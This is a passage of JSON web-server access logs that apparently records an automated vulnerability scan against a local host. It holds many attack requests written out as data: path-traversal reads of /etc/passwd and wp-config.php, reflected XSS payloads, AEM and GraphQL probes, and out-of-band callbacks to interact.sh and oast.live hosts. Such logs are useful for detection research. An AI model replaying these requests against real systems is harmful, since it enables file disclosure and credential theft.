+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C\x5C..\x5C\x5C..\x5C\x5Cconfig\x5C\x5Cconfig_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"\x0D\x0A\x0D\x0Apingback.ping\x0D\x0A\x0D\x0A\x0D\x0Ahttp://ca28fg0smpvbd3qg07h0ttafjdkkr574u.oast.live\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc/pingback HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/page/login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/sdcall/Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?29KD24F8c1m5QHYG1vdjYYNPTKD=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php~ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ibmmq/console/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/script/common.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dokuwiki/doku.php?id=wiki:welcome&at= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboardUser HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/elfinder.min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/flags HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin//phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/auth/roles HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_notes/dwsync.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json/v1.0/29KD1y80KjfsG76JxkQOo4KDwtX@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KD1t81V3ANvXWI38QjSht8M4Q.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.orig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?a=display&templateFile=README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 